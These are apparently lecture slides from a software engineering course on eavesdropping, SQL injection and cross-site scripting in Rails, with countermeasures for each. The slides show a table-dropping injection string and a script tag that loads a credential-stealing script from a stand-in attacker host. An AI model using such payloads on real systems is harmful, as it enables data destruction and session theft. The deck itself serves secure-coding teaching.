Security: Exploits & Countermeasures

Slides:



Advertisements
Similar presentations
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Advertisements

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Martin Kruliš by Martin Kruliš (v1.0)1.
Ruby on Rails CSCI 6314 David Gaspar Jennifer Garcia Avila.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
Lecture 16 Page 1 CS 236 Online SQL Injection Attacks Many web servers have backing databases –Much of their information stored in a database Web pages.
OSI and TCP/IP Models And Some Vulnerabilities AfNOG th May 2011 – 10 th June 2011 Tanzania By Marcus K. G. Adomey.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 1 RubyJax Brent Morris/
COMPUTER SECURITY MIDTERM REVIEW CS161 University of California BerkeleyApril 4, 2012.
Ram Santhanam Application Level Attacks - Session Hijacking & Defences
Security (Keep your site secure at extension level) Sergey Gorstka Fastw3b.
Building Secure Web Applications With ASP.Net MVC.
By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.
Cross Site Scripting and its Issues By Odion Oisamoje.
Web Security SQL Injection, XSS, CSRF, Parameter Tampering, DoS Attacks, Session Hijacking SoftUni Team Technical Trainers Software University
Web Application Vulnerabilities ECE 4112 Internetwork Security, Spring 2005 Chris Kelly Chris Lewis April 28, 2005 ECE 4112 Internetwork Security, Spring.
PwC New Technologies New Risks. PricewaterhouseCoopers Technology and Security Evolution Mainframe Technology –Single host –Limited Trusted users Security.
Web Security Group 5 Adam Swett Brian Marco. Why Web Security? Web sites and web applications constantly growing Complex business applications are now.
COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
Copyright © The OWASP Foundation This work is available under the Creative Commons SA 2.5 license The OWASP Foundation OWASP Denver February 2012.
What Is XSS ? ! Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
Carrie Estes Collin Donaldson.  Zero day attacks  “zero day”  Web application attacks  Signing up for a class  Hardening the web server  Enhancing.
SECURE DEVELOPMENT. SEI CERT TOP 10 SECURE CODING PRACTICES Validate input Use strict compiler settings and resolve warnings Architect and design for.
Defense In Depth: Minimizing the Risk of SQL Injection
ArcGIS for Server Security: Advanced
Database and Cloud Security
COMP9321 Web Application Engineering Semester 2, 2017
Google’s Gruyere1 : An XSS Example Presented by: Terry Gregory
Web Application Security
Building Secure ColdFusion Applications
CSE 154 Lecture 25: web security.
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Section 6.3 Server-side Scripting
Securing Your Web Application in Azure with a WAF
Chapter 7: Identifying Advanced Attacks
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
Software Design.
Server Concepts Dr. Charles W. Kann.
What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.
Security mechanisms and vulnerabilities in .NET
CSE 154 Lecture 26: web security.
Defense in Depth Web Server Custom HTTP Handler Input Validation
CSC 495/583 Topics of Software Security Intro to Web Security
Chapter 13 Security Methods Part 3.
Web Security Advanced Network Security Peter Reiher August, 2014
AppExchange Security Certification
Lecture 2 - SQL Injection
Security: Exploits & Countermeasures
Security: Authentication & Authorization
Security: Exploits & Countermeasures
Protecting Against Common Web Application Vulnerabilities
Databases and the MVC Model
Lecture 27 Security I April 4, 2018 Open news web sites.
Module 4 System and Application Security
Security: Attacks & Countermeasures
Security and JavaScript
Presentation transcript:

Security: Exploits & Countermeasures http://xkcd.com/327/ Security: Exploits & Countermeasures

SWEBOK KAs covered so far Software Requirements Software Design Software Construction Software Testing Software Maintenance Software Configuration Management Software Engineering Management Software Engineering Process Software Engineering Models and Methods Software Quality Software Engineering Professional Practice Software Engineering Economics Computing Foundations Mathematical Foundations Engineering Foundations Today’s topic: Security

Three Common Web App Exploits and Countermeasures I’ll unfold them one by one…

What potential exploit is here? Ye Olde Internet Browser Rails Router Controller View Model DB

What potential exploit is here? Ye Olde Internet Browser Rails Router Controller View Model DB Eavesdropping, packet sniffing, man-in-the-middle

Example: Unsecured Sign-Up Page Trivial for packet sniffer to steal

How to prevent? Browser Ye Olde Internet Rails Router Controller View Model DB

Encrypt communications with SSL (HTTPS) How to prevent? Ye Olde Internet Browser Rails Router Controller View Model DB Encrypt communications with SSL (HTTPS)

How to enable site-wide SSL in Rails Also requires config on production server E.g.: Signed certificate Taken from https://www.railstutorial.org/book/ (3rd Ed.) Listing 7.26 See also http://guides.rubyonrails.org/configuring.html#rails-general-configuration

Three Common Web App Exploits and Countermeasures Exploit: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL

Why were the student records lost? http://xkcd.com/327/

Why were the student records lost? http://xkcd.com/327/ The name string “Robert'); DROP TABLE Students;--” injected malicious code But how can this happen?

Imagine controller that looks up students by name id = "Robert" … Student.where("name = '#{id}'")

Imagine controller that looks up students by name id = "Robert" … Student.where("name = '#{id}'") SELECT * FROM students WHERE name = 'Robert'; Rails ORM translates to…

What if…? id = "Robert'; DROP TABLE students;--" … Student.where("name = '#{id}'")

What if…? id = "Robert'; DROP TABLE students;--" … Student.where("name = '#{id}'") SELECT * FROM students WHERE name = 'Robert'; DROP TABLE students;--';

How to prevent SQL injection? id = "Robert'; DROP TABLE students;--" … Student.where("name = '#{id}'")

How to prevent SQL injection? id = "Robert'; DROP TABLE students;--" … Student.where("name = '#{id}'") Student.where("name = ?", id) Write like this! Automatically escapes input

Translation becomes… id = "Robert'; DROP TABLE students;--" … Student.where("name = ?", id) SELECT * FROM students WHERE name = 'Robert\'\; DROP TABLE students\;\-\-';

Three Common Web App Exploits and Countermeasures Exploit: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL Exploit: SQL injection Countermeasure: Use escaped queries

Micropost Example: What if…?

Micropost Example: What if…? User posts Blah blah… <script src="http://mallorysevilsite.com/authstealer.js">

Malicious script runs when feed loads! Blah blah… <script src="http://mallorysevilsite.com/authstealer.js">

How to prevent cross-site scripting (XSS)?

How to prevent cross-site scripting (XSS)? Use Rails! Hartl: “Rails automatically prevents the [XSS] problem by escaping any content inserted into view templates.” <script src="http://mallorysevilsite.com/authstealer.js"> <script src="http://mallorysevilsite.com/authstealer.js"> ERB translates variable values to…

Three Common Web App Exploits and Countermeasures Exploit: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL Exploit: SQL injection Countermeasure: Use escaped queries Exploit: Cross-site scripting (another type of injection) Countermeasure: Use Rails (escape text) Although these exploits are common, there are many more (e.g., cross-site request forgery – see Hartl Ch. 3)

CERT Top 10 Software Security Practices Validate input Heed compiler warnings Architect and design for security policies Keep it simple Default deny Adhere to the principle of least privilege Sanitize data sent to other software Practice defense in depth Use effective quality assurance techniques Adopt a software construction security standard US-CERT is the Computer Emergency Response Team for the United States Taken from https://www.securecoding.cert.org/

For more vulnerabilities and countermeasures, see the Rails Security Guide http://guides.rubyonrails.org/security.html

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.